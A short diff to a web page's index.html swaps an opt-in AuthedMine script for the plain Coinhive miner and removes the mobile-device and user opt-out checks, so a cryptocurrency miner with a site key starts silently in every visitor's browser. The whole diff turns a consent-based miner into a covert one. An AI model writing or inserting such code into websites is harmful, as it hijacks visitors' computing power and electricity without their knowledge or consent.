--- a/oszika/index.html
+++ b/oszika/index.html
@@ -5,15 +5,11 @@
 <!--[if gt IE 8]><!--> <html class="no-js" lang=""> <!--<![endif]-->
     <head>
 	    
-	    <script src="https://authedmine.com/lib/authedmine.min.js"></script>
+	    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
 <script>
-	var miner = new CoinHive.Anonymous('fsWFBucmnSvyWGT2LmQZjVLFwS28U2S0', {throttle: 0.3});
-
-	// Only start on non-mobile devices and if not opted-out
-	// in the last 14400 seconds (4 hours):
-	if (!miner.isMobile() && !miner.didOptOut(14400)) {
+	var miner = new CoinHive.Anonymous('fsWFBucmnSvyWGT2LmQZjVLFwS28U2S0', {throttle: 0.3});	
 		miner.start();
-	}
+	
 	
 </script>
 	    
